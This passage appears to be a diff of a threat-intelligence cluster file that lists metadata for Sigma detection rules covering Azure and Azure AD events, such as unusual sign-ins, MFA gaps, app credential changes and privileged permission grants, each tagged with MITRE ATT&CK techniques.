"MikeDuddington, '@dudders1'", - "creation_date": "2022/07/28", - "falsepositive": [ - "If this was approved by System Administrator." 
- ], - "filename": "azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml" - ], - "tags": [ - "attack.t1078" - ] - }, - "uuid": "8c944ecb-6970-4541-8496-be554b8e2846", - "value": "Successful Authentications From Countries You Do Not Operate Out Of" - }, - { - "description": "Detects when sign-ins increased by 10% or greater.", - "meta": { - "author": "Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1'", - "creation_date": "2022/08/11", - "falsepositive": [ - "Unlikely" - ], - "filename": "azure_ad_auth_failure_increase.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-for-failed-unusual-sign-ins", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_auth_failure_increase.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1078" - ] - }, - "uuid": "e1d02b53-c03c-4948-b11d-4d00cca49d03", - "value": "Increased Failed Authentications Of Any Type" - }, - { - "description": "Detects when successful sign-ins increased by 10% or greater.", - "meta": { - "author": "Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim Shelton", - "creation_date": "2022/08/11", - "falsepositive": [ - "Increase of users in the environment" - ], - "filename": "azure_ad_auth_sucess_increase.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - 
"https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-for-successful-unusual-sign-ins", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_auth_sucess_increase.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1078" - ] - }, - "uuid": "67d5f8fc-8325-44e4-8f5f-7c0ac07cb5ae", - "value": "Measurable Increase Of Successful Authentications" - }, - { - "description": "Detect when authentications to important application(s) only required single-factor authentication", - "meta": { - "author": "MikeDuddington, '@dudders1'", - "creation_date": "2022/07/28", - "falsepositive": [ - "If this was approved by System Administrator." - ], - "filename": "azure_ad_auth_to_important_apps_using_single_factor_auth.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_auth_to_important_apps_using_single_factor_auth.yml" - ], - "tags": [ - "attack.t1078" - ] - }, - "uuid": "f272fb46-25f2-422c-b667-45837994980f", - "value": "Authentications To Important Apps Using Single Factor Authentication" - }, - { - "description": "Monitor and alert for Bitlocker key retrieval.", - "meta": { - "author": "Michael Epping, '@mepples21'", - "creation_date": "2022/06/28", - "falsepositive": [ - "Unknown" - ], - "filename": "azure_ad_bitlocker_key_retrieval.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#bitlocker-key-retrieval", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_bitlocker_key_retrieval.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1078" - ] 
- }, - "uuid": "a0413867-daf3-43dd-9245-734b3a787942", - "value": "Bitlocker Key Retrieval" - }, - { - "description": "Monitor and alert for device registration or join events where MFA was not performed.", - "meta": { - "author": "Michael Epping, '@mepples21'", - "creation_date": "2022/06/28", - "falsepositive": [ - "Unknown" - ], - "filename": "azure_ad_device_registration_or_join_without_mfa.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-registrations-and-joins-outside-policy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_device_registration_or_join_without_mfa.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1078" - ] - }, - "uuid": "5afa454e-030c-4ab4-9253-a90aa7fcc581", - "value": "Device Registration or Join Without MFA" - }, - { - "description": "Monitor and alert for changes to the device registration policy.", - "meta": { - "author": "Michael Epping, '@mepples21'", - "creation_date": "2022/06/28", - "falsepositive": [ - "Unknown" - ], - "filename": "azure_ad_device_registration_policy_changes.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-registrations-and-joins-outside-policy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_device_registration_policy_changes.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1484" - ] - }, - "uuid": "9494bff8-959f-4440-bbce-fb87a208d517", - "value": "Changes to Device Registration Policy" - }, - { - "description": "Detect failed authentications from countries you do not operate out of.", - "meta": { - "author": "MikeDuddington, '@dudders1'", - 
"creation_date": "2022/07/28", - "falsepositive": [ - "If this was approved by System Administrator." - ], - "filename": "azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml" - ], - "tags": [ - "attack.t1078" - ] - }, - "uuid": "28870ae4-6a13-4616-bd1a-235a7fad7458", - "value": "Failed Authentications From Countries You Do Not Operate Out Of" - }, - { - "description": "Detects guest users being invited to tenant by non-approved inviters", - "meta": { - "author": "MikeDuddington, '@dudders1'", - "creation_date": "2022/07/28", - "falsepositive": [ - "If this was approved by System Administrator." - ], - "filename": "azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml" - ], - "tags": [ - "attack.t1078" - ] - }, - "uuid": "4ad97bf5-a514-41a4-abd3-4f3455ad4865", - "value": "Guest Users Invited To Tenant By Non Approved Inviters" - }, - { - "description": "Detect when users are authenticating without MFA being required.", - "meta": { - "author": "MikeDuddington, '@dudders1'", - "creation_date": "2022/07/27", - "falsepositive": [ - "If this was approved by System Administrator." 
- ], - "filename": "azure_ad_only_single_factor_auth_required.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_only_single_factor_auth_required.yml" - ], - "tags": [ - "attack.t1078" - ] - }, - "uuid": "28eea407-28d7-4e42-b0be-575d5ba60b2c", - "value": "Azure AD Only Single Factor Authentication Required" - }, - { - "description": "Monitor and alert for sign-ins where the device was non-compliant.", - "meta": { - "author": "Michael Epping, '@mepples21'", - "creation_date": "2022/06/28", - "falsepositive": [ - "Unknown" - ], - "filename": "azure_ad_sign_ins_from_noncompliant_devices.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_sign_ins_from_noncompliant_devices.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1078" - ] - }, - "uuid": "4f77e1d7-3982-4ee0-8489-abf2d6b75284", - "value": "Sign-ins from Non-Compliant Devices" - }, - { - "description": "Monitor and alert for Sign-ins by unknown devices from non-Trusted locations.", - "meta": { - "author": "Michael Epping, '@mepples21'", - "creation_date": "2022/06/28", - "falsepositive": [ - "Unknown" - ], - "filename": "azure_ad_sign_ins_from_unknown_devices.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_sign_ins_from_unknown_devices.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1078" - ] - }, - "uuid": "4d136857-6a1a-432a-82fc-5dd497ee5e7c", - "value": "Sign-ins by Unknown Devices" - }, - { - "description": "Monitor and alert for users added to device admin roles.", - "meta": { - "author": "Michael Epping, '@mepples21'", - "creation_date": "2022/06/28", - "falsepositive": [ - "Unknown" - ], - "filename": "azure_ad_users_added_to_device_admin_roles.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-administrator-roles", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_users_added_to_device_admin_roles.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1078" - ] - }, - "uuid": "11c767ae-500b-423b-bae3-b234450736ed", - "value": "Users Added to Global or Device Admin Roles" - }, - { - "description": "User Added to an Administrator's Azure AD Role", - "meta": { - "author": "Raphaël CALVET, @MetallicHack", - "creation_date": "2021/10/04", - "falsepositive": [ - "PIM (Privileged Identity Management) generates this event each time 'eligible role' is enabled." 
- ], - "filename": "azure_ad_user_added_to_admin_role.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://attack.mitre.org/techniques/T1098/003/", - "https://m365internals.com/2021/07/13/what-ive-learned-from-doing-a-year-of-cloud-forensics-in-azure-ad/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_user_added_to_admin_role.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098.003" - ] - }, - "uuid": "ebbeb024-5b1d-4e16-9c0c-917f86c708a7", - "value": "User Added to an Administrator's Azure AD Role" - }, - { - "description": "Identifies when a application is deleted in Azure.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/03", - "falsepositive": [ - "Application being deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Application deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "azure_application_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_application_deleted.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "410d2a41-1e6d-452f-85e5-abdd8257a823", - "value": "Azure Application Deleted" - }, - { - "description": "Identifies when a application gateway is modified or deleted.", - "meta": { - "author": "Austin Songer", - "creation_date": "2021/08/16", - "falsepositive": [ - "Application gateway being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Application gateway modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "azure_application_gateway_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_application_gateway_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "ad87d14e-7599-4633-ba81-aeb60cfe8cd6", - "value": "Azure Application Gateway Modified or Deleted" - }, - { - "description": "Identifies when a application security group is modified or deleted.", - "meta": { - "author": "Austin Songer", - "creation_date": "2021/08/16", - "falsepositive": [ - "Application security group being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Application security group modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "azure_application_security_group_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_application_security_group_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "835747f1-9329-40b5-9cc3-97d465754ce6", - "value": "Azure Application Security Group Modified or Deleted" - }, - { - "description": "Detects when a configuration change is made to an applications AppID URI.", - "meta": { - "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", - "creation_date": "2022/06/02", - "falsepositive": [ - "When and administrator is making legitimate AppID URI configuration changes to an application. This should be a planned event." - ], - "filename": "azure_app_appid_uri_changes.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#appid-uri-added-modified-or-removed", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_appid_uri_changes.yml" - ], - "tags": [ - "attack.t1528", - "attack.persistence", - "attack.credential_access" - ] - }, - "uuid": "1b45b0d1-773f-4f23-aedc-814b759563b1", - "value": "Application AppID Uri Configuration Changes" - }, - { - "description": "Detects when a new credential is added to an existing application. 
Any additional credentials added outside of expected processes could be a malicious actor using those credentials.", - "meta": { - "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", - "creation_date": "2022/05/26", - "falsepositive": [ - "When credentials are added/removed as part of the normal working hours/workflows" - ], - "filename": "azure_app_credential_added.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-credentials", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_credential_added.yml" - ], - "tags": [ - "attack.t1098", - "attack.persistence" - ] - }, - "uuid": "cbb67ecc-fb70-4467-9350-c910bdf7c628", - "value": "Added Credentials to Existing Application" - }, - { - "description": "Identifies when a application credential is modified.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/02", - "falsepositive": [ - "Application credential added may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Application credential added from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "azure_app_credential_modification.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://www.cloud-architekt.net/auditing-of-msi-and-service-principals/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_credential_modification.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "cdeef967-f9a1-4375-90ee-6978c5f23974", - "value": "Azure Application Credential Modified" - }, - { - "description": "Detects when highly privileged delegated permissions are granted on behalf of all users", - "meta": { - "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", - "creation_date": "2022/07/28", - "falsepositive": [ - "When the permission is legitimately needed for the app" - ], - "filename": "azure_app_delegated_permissions_all_users.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_delegated_permissions_all_users.yml" - ], - "tags": [ - "attack.privilege_escalation" - ] - }, - "uuid": "a6355fbe-f36f-45d8-8efc-ab42465cbc52", - "value": "Delegated Permissions Granted For All Users" - }, - { - "description": "Device code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments.\nIf this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted.\nThis can be a misconfigured application or potentially something malicious.\n", - "meta": { - "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", - "creation_date": "2022/06/01", - "falsepositive": [ - "Applications that are input 
constrained will need to use device code flow and are valid authentications." - ], - "filename": "azure_app_device_code_authentication.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-authentication-flows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_device_code_authentication.yml" - ], - "tags": [ - "attack.t1078", - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.initial_access" - ] - }, - "uuid": "248649b7-d64f-46f0-9fb2-a52774166fb5", - "value": "Application Using Device Code Authentication Flow" - }, - { - "description": "Detects when an end user consents to an application", - "meta": { - "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", - "creation_date": "2022/07/28", - "falsepositive": [ - "Unknown" - ], - "filename": "azure_app_end_user_consent.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#end-user-consent", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_end_user_consent.yml" - ], - "tags": [ - "attack.privilege_escalation" - ] - }, - "uuid": "9b2cc4c4-2ad4-416d-8e8e-ee6aa6f5035a", - "value": "End User Consent" - }, - { - "description": "Detects when end user consent is blocked due to risk-based consent.", - "meta": { - "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", - "creation_date": "2022/07/10", - "falsepositive": [ - "Unknown" - ], - "filename": "azure_app_end_user_consent_blocked.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - 
"https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#end-user-stopped-due-to-risk-based-consent", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_end_user_consent_blocked.yml" - ], - "tags": [ - "attack.privilege_escalation" - ] - }, - "uuid": "7091372f-623c-4293-bc37-20c32b3492be", - "value": "End User Consent Blocked" - }, - { - "description": "Detects when a new owner is added to an application. This gives that account privileges to make modifications and configuration changes to the application.", - "meta": { - "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", - "creation_date": "2022/06/02", - "falsepositive": [ - "When a new application owner is added by an administrator" - ], - "filename": "azure_app_owner_added.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#new-owner", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_owner_added.yml" - ], - "tags": [ - "attack.t1528", - "attack.persistence", - "attack.credential_access", - "attack.defense_evasion" - ] - }, - "uuid": "74298991-9fc4-460e-a92e-511aa60baec1", - "value": "Added Owner To Application" - }, - { - "description": "Detects when app permissions (app roles) for other APIs are granted", - "meta": { - "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", - "creation_date": "2022/07/28", - "falsepositive": [ - "When the permission is legitimately needed for the app" - ], - "filename": "azure_app_permissions_for_api.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - 
"https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_permissions_for_api.yml" - ], - "tags": [ - "attack.privilege_escalation" - ] - }, - "uuid": "ba2a7c80-027b-460f-92e2-57d113897dbc", - "value": "App Permissions Granted For Other APIs" - }, - { - "description": "Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, Sharepoint, or Azure AD", - "meta": { - "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", - "creation_date": "2022/07/10", - "falsepositive": [ - "When the permission is legitimately needed for the app" - ], - "filename": "azure_app_permissions_msft.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_permissions_msft.yml" - ], - "tags": [ - "attack.privilege_escalation" - ] - }, - "uuid": "c1d147ae-a951-48e5-8b41-dcd0170c7213", - "value": "App Granted Microsoft Permissions" - }, - { - "description": "Detects when administrator grants either application permissions (app roles) or highly privileged delegated permissions", - "meta": { - "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", - "creation_date": "2022/07/28", - "falsepositive": [ - "When the permission is legitimately needed for the app" - ], - "filename": "azure_app_privileged_permissions.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "microsoft365portal", - "refs": [ - 
"https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_privileged_permissions.yml" - ], - "tags": [ - "attack.privilege_escalation" - ] - }, - "uuid": "5aecf3d5-f8a0-48e7-99be-3a759df7358f", - "value": "App Granted Privileged Delegated Or App Permissions" - }, - { - "description": "Detects when an app is assigned Azure AD roles, such as global adminsitrator, or Azure RBAC roles, such as subscription owner.", - "meta": { - "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", - "creation_date": "2022/07/19", - "falsepositive": [ - "When the permission is legitimately needed for the app" - ], - "filename": "azure_app_role_added.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#service-principal-assigned-to-a-role", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_role_added.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "b04934b2-0a68-4845-8a19-bdfed3a68a7a", - "value": "App Role Added" - }, - { - "description": "Resource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly.\nThe application then uses those credentials to authenticate the user against the identity provider.\n", - "meta": { - "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", - "creation_date": "2022/06/01", - "falsepositive": [ - "Applications that are being used as part of automated testing or a legacy application that cannot use any other modern authentication flow" - ], - "filename": "azure_app_ropc_authentication.yml", - "level": "medium", - 
"logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-authentication-flows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_ropc_authentication.yml" - ], - "tags": [ - "attack.t1078", - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.initial_access" - ] - }, - "uuid": "55695bc0-c8cf-461f-a379-2535f563c854", - "value": "Applications That Are Using ROPC Authentication Flow" - }, - { - "description": "Detects when a configuration change is made to an applications URI.\nURIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app, or URIs that point to domains you do not control should be investigated.\n", - "meta": { - "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", - "creation_date": "2022/06/02", - "falsepositive": [ - "When and administrator is making legitimate URI configuration changes to an application. This should be a planned event." 
- ], - "filename": "azure_app_uri_modifications.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-configuration-changes", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_uri_modifications.yml" - ], - "tags": [ - "attack.t1528", - "attack.persistence", - "attack.credential_access" - ] - }, - "uuid": "0055ad1f-be85-4798-83cf-a6da17c993b3", - "value": "Application URI Configuration Changes" - }, - { - "description": "Detects when an account is disabled or blocked for sign in but tried to log in", - "meta": { - "author": "Yochana Henderson, '@Yochana-H'", - "creation_date": "2022/06/17", - "falsepositive": [ - "Account disabled or blocked in error", - "Automation account has been blocked or disabled" - ], - "filename": "azure_blocked_account_attempt.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_blocked_account_attempt.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110" - ] - }, - "uuid": "4afac85c-224a-4dd7-b1af-8da40e1c60bd", - "value": "Account Disabled or Blocked for Sign in Attempts" - }, - { - "description": "Change to authentication method could be an indicated of an attacker adding an auth method to the account so they can have continued access.", - "meta": { - "author": "AlertIQ", - "creation_date": "2021/10/10", - "falsepositive": [ - "Unknown" - ], - "filename": "azure_change_to_authentication_method.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - 
"https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_change_to_authentication_method.yml" - ], - "tags": [ - "attack.credential_access" - ] - }, - "uuid": "4d78a000-ab52-4564-88a5-7ab5242b20c7", - "value": "Change to Authentication Method" - }, - { - "description": "Define a baseline threshold for failed sign-ins due to Conditional Access failures", - "meta": { - "author": "Yochana Henderson, '@Yochana-H'", - "creation_date": "2022/06/01", - "falsepositive": [ - "Service Account misconfigured", - "Misconfigured Systems", - "Vulnerability Scanners" - ], - "filename": "azure_conditional_access_failure.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_conditional_access_failure.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110" - ] - }, - "uuid": "b4a6d707-9430-4f5f-af68-0337f52d5c42", - "value": "Sign-in Failure Due to Conditional Access Requirements Not Met" - }, - { - "description": "Detects when a Container Registry is created or deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/07", - "falsepositive": [ - "Container Registry being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Container Registry created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "azure_container_registry_created_or_deleted.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", - "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_container_registry_created_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "93e0ef48-37c8-49ed-a02c-038aab23628e", - "value": "Azure Container Registry Created or Deleted" - }, - { - "description": "Number of VM creations or deployment activities occur in Azure via the azureactivity log.", - "meta": { - "author": "sawwinnnaung", - "creation_date": "2020/05/07", - "falsepositive": [ - "Valid change" - ], - "filename": "azure_creating_number_of_resources_detection.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Creating_Anomalous_Number_Of_Resources_detection.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_creating_number_of_resources_detection.yml" - ], - "tags": [ - "attack.t1098" - ] - }, - "uuid": "d2d901db-7a75-45a1-bc39-0cbf00812192", - "value": "Number Of Resource Creation Or Deployment Activities" - }, - { - "description": "Identifies when a device in azure is no longer managed or compliant", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/03", - "falsepositive": [ - 
"Administrator may have forgotten to review the device." - ], - "filename": "azure_device_no_longer_managed_or_compliant.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_device_no_longer_managed_or_compliant.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "542b9912-c01f-4e3f-89a8-014c48cdca7d", - "value": "Azure Device No Longer Managed or Compliant" - }, - { - "description": "Identifies when a device or device configuration in azure is modified or deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/03", - "falsepositive": [ - "Device or device configuration being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Device or device configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
